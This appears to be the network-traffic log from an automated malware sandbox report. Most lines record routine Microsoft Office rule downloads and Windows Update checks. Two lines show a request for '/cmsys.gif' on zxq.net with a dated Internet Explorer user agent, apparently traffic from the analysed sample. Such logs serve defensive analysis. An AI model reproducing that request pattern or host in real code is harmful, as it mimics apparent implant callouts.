                    Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /sls/ping HTTP/1.1Connection: Keep-AliveUser-Agent: DNS resiliency checker/1.0Host: slscr.update.microsoft.com
                    Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=VatNPFTcculonAy&MD=pDKKvD8Y HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                    Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=VatNPFTcculonAy&MD=pDKKvD8Y HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                    Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
